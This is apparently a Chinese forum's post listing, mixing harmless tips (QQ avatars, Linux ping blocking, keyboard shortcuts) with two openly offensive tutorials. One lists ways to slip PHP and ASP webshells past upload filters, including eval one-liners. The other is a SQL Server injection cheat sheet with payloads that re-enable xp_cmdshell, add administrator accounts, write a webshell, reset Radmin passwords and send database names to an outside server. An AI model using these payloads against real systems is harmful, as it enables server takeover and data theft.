一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
今日:0    总帖:137
wolfman
2812
有的朋友还不知道QQ透明头像是怎么做的,现在说下工具:①安卓手机一台            ②QQ2012日本版            ③透明头像素材 当然也可以自己制作(不懂可以提问)  素材教程:①安装QQ2012日本版            ②打开,登录自己的QQ            ③登录成功了就点击自己的资料→点击自己头像→然后用你喜欢的透明头像素材更换头像(虽然日本版是日文,但是更换头像这些基本操作还是可以摸索的)            ④更换好了就退出来,打开原来的QQ2015,点击自己资料,刷新一下,就会发现头像变成透明的了!             教程结束。
2 0 2399天前
wolfman
2980
ps全套技术教程 有图 附件   技术教程
费用:3狼豆ps技术教程:ps教程
5 0 2399天前
wolfman
2944
ping是一个通信协议,是ip协议的一部分,tcp/ip 协议的一部分。利用它可以检查网络是否能够连通,用好它可以很好地帮助我们分析判定网络故障。应用格式为:Ping IP地址。但服务启用ping有时候会造成很多麻烦。 因此有时候根据需要(如防止攻击),Linux服务器管理员可限制服务器禁止其它用户Ping。同时又保证Linux服务器又可以Ping其它服务器.下面介绍几种linux服务器下禁止ping的方法:<1>临时的禁ping方法:以下2种方式都是临时有效,重启服务器设置将失效.首先登陆服务器终端以下执行:echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all或者sysctl -w net.ipv4.icmp_echo_ignore_all=1这样就可以禁ping了;如果想恢复ping可以执行以下命令:echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all或者sysctl -w net.ipv4.icmp_echo_ignore_all=0以上修改后,均可以通过查看以下文件来查看设置vi /proc/sys/net/ipv4/icmp_echo_ignore_all 但是,该文件不能直接修改! <2>永久禁ping方法若想永久实现禁ping,可以修改/etc/sysctl.conf文件,如下:vi /etc/sysctl.confnet.ipv4.icmp_echo_ignore_all = 1   //默认设置为0. 以上操作,还是有前提的,若主机本身自带防火墙iptables中INPUT、OUTPUT默认策略为ACCEPT,那么主机默认是允许ping.则可以直接做以上修改,即可起到临时或永久禁ping效果.若iptables中INPUT、OUTPUT默认策略均为DROP时,那么主机本身默认已经禁ping,则无需做以上修改了.同样,若需要开启ping,则需要添加相应的策略.如下:若iptables中INPUT、OUTPUT均为DROP话,则需要添加:iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPTiptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT
6 1 2399天前
sanqing
2582
逼话不多链接:打开
5 1 2400天前
wolfman
3257
全套百度云链接:易语言教程
4 0 2408天前
sanqing
3089
Ctrl+S 保存Ctrl+W 关闭程序Ctrl+N 新建Ctrl+O 打开Ctrl+Z 撤销Ctrl+F 查找Ctrl+X 剪切Ctrl+C 复制Ctrl+V 粘贴Ctrl+A 全选Ctrl+[ 缩小文字  Ctrl+] 放大文字Ctrl+B 粗体Ctrl+I 斜体Ctrl+U 下划线Ctrl+Shift 输入法切换Ctrl+空格 中英文切换Ctrl+回车 QQ号中发送信息Ctrl+Home 光标快速移到文件头Ctrl+End 光标快速移到文件尾Ctrl+Esc 显示开始菜单Ctrl+Shift+< 快速缩小文字Ctrl+Shift+> 快速放大文字Ctrl+F5 在IE中强行刷新Ctrl+拖动文件 复制文件Ctrl+Backspace 启动\关闭输入法拖动文件时按住Ctrl+Shift 创建快捷方式  Alt+空格+C 关闭窗口Alt+空格+N 最小化当前窗口Alt+空格+R 恢复最小化窗口Alt+空格+X 最大化当前窗口
5 0 2408天前
wolfman
3132
一般网站图片上传功能都对文件进行过滤,防止webshell写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?本文总结了七种方法,可以突破!1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。5、在4基础上改进代码<?php fputs(fopen(“error.php”.”w”).”<?eval(\$_POST[cmd]);?>”)?> 。(php)//同目录下生成error.php,提问:asp的怎么改写?回答:asp测试的结果是:没有权限…<%Set MyFileObject=Server.CreateObject(“Scripting.FileSystemObject”)Set MyTextFile=MyFileObject.CreateTextFile(“kafei.asp”)MyTextFile.WriteLine(“\<\%eval request(chr(35))\%\>”)MyTextFile.Close%>6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。7、nc抓包改数据 //路径名和文件名没有过滤。//通过抓包修改上传路径通过/upload/1.asp+空格,使用软件把空格填充为00。然后nc提交获取webshell。
6 0 2411天前
wolfman
2933
常用的注入命令   技术教程
//看看是什么权限的and 1=(Select IS_MEMBER(db_owner))And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS(master))And char(124)%2BCast(HAS_DBACCESS(master) as varchar(1))%2Bchar(124)=1 --数字类型and char(124)%2Buser%2Bchar(124)=0字符类型and char(124)%2Buser%2Bchar(124)=0 and =搜索类型and char(124)%2Buser%2Bchar(124)=0 and %=爆用户名and user>0and user>0 and =检测是否为SA权限and 1=(select IS_SRVROLEMEMBER(sysadmin));--And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --检测是不是MSSQL数据库and exists (select * from sysobjects);--检测是否支持多行;declare @d int;--恢复 xp_cmdshell;exec master..dbo.sp_addextendedproc xp_cmdshell,xplog70.dll;--select * from openrowset(sqloledb,server=192.168.1.200,1433;uid=test;pwd=pafpaf,select @@version)//-----------------------// 执行命令//-----------------------首先开启沙盘模式:exec master..xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD,1然后利用jet.oledb执行系统命令select * from openrowset(microsoft.jet.oledb.4.0,;database=c:winntsystem32iasias.mdb,select shell("cmd.exe /c net user admin admin1234 /add"))执行命令;DECLARE @shell INT EXEC SP_OAcreate wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user paf pafpaf /add;--EXEC [master].[dbo].[xp_cmdshell] cmd /c md c:1111判断xp_cmdshell扩展存储过程是否存在:asp?keyno=188">http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_cmdshell)写注册表exec master..xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD,1REG_SZ读注册表exec master..xp_regread HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon,Userinit读取目录内容exec master..xp_dirtree c:winntsystem32,1,1数据库备份backup database pubs to disk = c:123.bak//爆出长度And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,新密码,sa添加和删除一个SA权限的用户test:exec master.dbo.sp_addlogin test,ptloveexec master.dbo.sp_addsrvrolemember test,sysadmin删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc xp_cmdshell添加扩展存储过过程EXEC [master]..sp_addextendedproc xp_proxiedadata, c:winntsystem32sqllog.dll GRANT exec On xp_proxiedadata TO public停掉或激活某个服务。exec master..xp_servicecontrol stop,scheduleexec master..xp_servicecontrol start,scheduledbo.xp_subdirs只列某个目录下的子目录。xp_getfiledetails C:InetpubwwwrootSQLInjectlogin.aspdbo.xp_makecab将目标多个档案压缩到某个目标档案之内。所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。dbo.xp_makecabc: est.cab,mszip,1,C:InetpubwwwrootSQLInjectlogin.asp,C:InetpubwwwrootSQLInjectsecurelogin.aspxp_terminate_process停掉某个执行中的程序,但赋予的参数是 Process ID。利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process IDxp_terminate_process 2484xp_unpackcab解开压缩档。xp_unpackcab c: est.cab,c: emp,1某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SYSTEMRAdminv2.0ServerParameters,Parameter,REG_BINARY,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SYSTEMRAdminv2.0ServerParameters,port,REG_BINARY,0xd20400 则端口值改为1234create database lcx;Create TABLE ku(name nvarchar(256) null);Create TABLE biao(id int NULL,name nvarchar(256) null);//得到数据库名insert into opendatasource(sqloledb,server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx).lcx.dbo.ku select name from master.dbo.sysdatabases//在Master中创建表,看看权限怎样Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--用 sp_makewebtask直接在web目录里写入一句话马:%20">https://127.0.0.1/dblogin123.asp?username=123;exec%20sp_makewebtask%20d:www t88.asp,%20select%20<%25execute(request("a"))%25>%20;--//更新表内容Update films SET kind = Dramatic Where id = 123//删除内容delete from table_name where Stockid = 3
6 0 2411天前
yixiaotao
2668
很多朋友和站长,都喜欢把一些演示的网页等等放到三维主机的免费空间去奈何主机商也会嵌入一些广告影响力用户的体验,今天就教大家如何通过代码的方式屏蔽广告一般情况下,我们看到的是这样:很疑惑,我们自己没有加广告,但是这个广为什么会显示到我们的网页的呐?Ctrl+U查看网页源码,发现:原来是三维主机空间商,给我们的网页<html>尾部添加了一段js代码那问题就简单了,我们尝试在<html>标签后添加一个注释字符(<!--)会怎样呐?如图:保存后上传覆盖,我们再来看看效果!发现没有广告了,查看源码:OK,各位朋友&站长你们学会了吗?是不是很棒棒锤啊?三维主机的免费空间一直稳定了这么久,希望各位朋友还是要善待。
7 0 2421天前
2385132828_sh
2528
您需要登录并回复后才可以查看该文章内容
8 2 2422天前
快速发帖 高级模式
加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:18.116.239.195,2024-04-27 01:43:09,Processed in 0.13824 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.0.0